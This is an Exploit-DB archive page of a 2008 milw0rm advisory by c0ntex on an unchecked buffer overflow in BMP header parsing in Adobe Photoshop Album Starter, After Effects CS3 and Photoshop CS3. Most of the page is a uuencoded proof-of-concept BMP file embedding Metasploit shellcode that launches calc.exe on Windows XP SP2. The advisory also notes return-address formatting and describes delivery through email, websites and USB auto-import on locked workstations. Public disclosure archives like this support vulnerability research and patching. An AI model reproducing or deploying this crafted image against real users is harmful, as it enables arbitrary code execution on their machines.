Exploitable issue in various Adobe products

vendor:
Adobe Photoshop Album Starter, Adobe After Effects CS3, Adobe Photoshop CS3
by:
c0ntex (c0ntexb@gmail.com), Scott Laurie
7.5
CVSS
HIGH
Unchecked buffer overflow
CWE
Product Name: Adobe Photoshop Album Starter, Adobe After Effects CS3, Adobe Photoshop CS3
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2
2008
Exploitable issue in various Adobe products

The bug is related to the parsing of header images in Adobe products, where the applications do not verify the validity of the image header before rendering it. This allows for an unchecked buffer overflow and the execution of malicious code. The exploit can be triggered by sending the malicious image to the user or hosting it on a website or email.
Mitigation:

Adobe should implement proper validation of image headers to prevent buffer overflow attacks.
Source
Exploit-DB raw data:

Exploitable issue in various Adobe products
c0ntex (c0ntexb@gmail.com) Scott Laurie
February 2008

Vulnerable applications, tested:
Adobe Photoshop Album Starter
Adobe After Effects CS3
Adobe Photoshop CS3

Not Vulnerable applications, tested:
Adobe Reader
Adobe Flash Player

This bug is related to the parsing of header images, in that the applications
do not verify that the image header is valid before trying to render it. This
leaves an opportunity to cause an unchecked buffer overflow and allow for the
execution of malicious code.

All the issues are standard local overflows whereby an attacker can exploit a
machine after sending the malicious image to the user, or by placing the image
on a web site or email and waiting for a user to view it in one of the effected
products.

One fun thing with Album Starter is that it will run a service which will look
for new devices being attached to the system, things like cameras or USB drives
and when one is found it will check the device for image files. If some are
found, the application will auto-run and import the images and thus allow the
attacker to exploit locked workstations.. pretty lame but fun :)

There is a caveats to the bug as the shellcode and return address need to be 4
byte values. Thus a return address of 0x41424344 needs to be in the following
format: "\x44\x44\x44\x44\x43\x43\x43\x43\x42\x42\x42\x42\x41\x41\x41\x41"


Exploit attached for Album Starter 3.2 on Windows XP SP2 to pop calc.exe:
Used shellcode is taken from the Metasploit project.


begin 644 Adobe_AS_Exploit.bmp
M0DTV`````````#8````H````0`8``+`$```!``@`04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04'\:NM-Z/G___]@BVPD)(M%/(M\!7@![XM/
M&(M?(`'K28LTBP'N,<"9K(3`="#!R@T*`<+K]#M4)"AUY8M?)`'K9HL,2XM?
M'`'K`RR+B6PD'&'#,=MDBT,PBT`,BW`<K8M`"%YHCDX.[%#_UF939F@S,FAW
M<S)?5/_0:,OM_#M0_]9?B>5F@>T(`E5J`O_0:-D)]:U7_]934U-34T-30U/_
MT&9H!-)F4XGAE6BD&G#'5__6:A!15?_0:*2M+NE7_]935?_0:.5)ADE7_]90
M5%15_]"3:.=YQGE7_]95_]!F:F1F:&-MB>5J4%DIS(GG:D2)XC'`\ZK^0BW^
M0BR3C7HXJZNK:'+^LQ;_=43_UEM74E%146H!45%54?_0:*W9!<Y3_]9J__\W
M_]"+5_R#Q&3_UE+_T&CPB@1?4__6_]``04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D-#0T-#0T-#0T-#0T-#
M0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#Z^OKZP0$!`20D)"0
MD)"0D&9F9F9=75U=L+"PL&%A86&0D)"0D)"0D)"0D)"0D)"0,S,S,\G)R<F#
M@X.#Z>GIZ=W=W=W9V=G9[N[N[MG9V=ET='1T)"0D)/3T]/1;6UM;@8&!@7-S
M<W,3$Q,36EI:6N[N[NXG)R<GBHJ*BH.#@X/KZ^OK_/S\_.+BXN+T]/3TIJ:F
MI@8&!@9C8V-CBHJ*BEI:6EKN[N[NK*RLK,_/S\]F9F9F965E95M;6UN/CX^/
M(B(B(N_O[^_(R,C(`0$!`145%17V]O;VK*RLK-75U=5Z>GIZ[^_O[\S,S,S#
MP\/#T='1T=K:VMJLK*RLBXN+B[2TM+3?W]_?Y^?GYQ,3$Q/V]O;V:FIJ:N?G
MY^?^_O[^75U=72\O+R_M[>WMAX>'AUM;6ULL+"PLS,S,S'Y^?GYA86%ANKJZ
MN@,#`P..CHZ.+R\O+PL+"PNLK*RLU=75U7Y^?G[O[^_OS,S,S.SL[.S1T='1
MXN+BXFQL;&P!`0$!!04%!?+R\O(F)B8F86%A8='1T='R\O+RK*RLK(N+BXNQ
ML;&Q9V=G9WM[>WNNKJZN7EY>7BTM+2T6%A862DI*2CX^/CYE965E9V=G9[JZ
MNKK?W]_?+BXN+E]?7U^&AH:&T='1T:ZNKJXK*RLK`0$!`2HJ*BKR\O+RBHJ*
MB@$!`0$R,C(RYN;FYLS,S,R#@X.#T='1T6YN;FZ7EY>7BHJ*BEI:6EKN[N[N
MK*RLK.+BXN)F9F9FL;&QL186%A9\?'Q\.CHZ.KBXN+BNKJZN<G)R<MG9V=DN
M+BXN7%Q<7-K:VMHR,C(R'AX>'JVMK:V.CHZ.!04%!8:&AH:_O[^_='1T=-#0
MT-#@X.#@<'!P<'5U=76]O;V]C8V-C49&1D;FYN;F.3DY.<#`P,!"0D)"\O+R
1\C\_/S_N[N[N)R<G)XJ*BHH`
`
end



regards
c0ntex

# milw0rm.com [2008-04-21]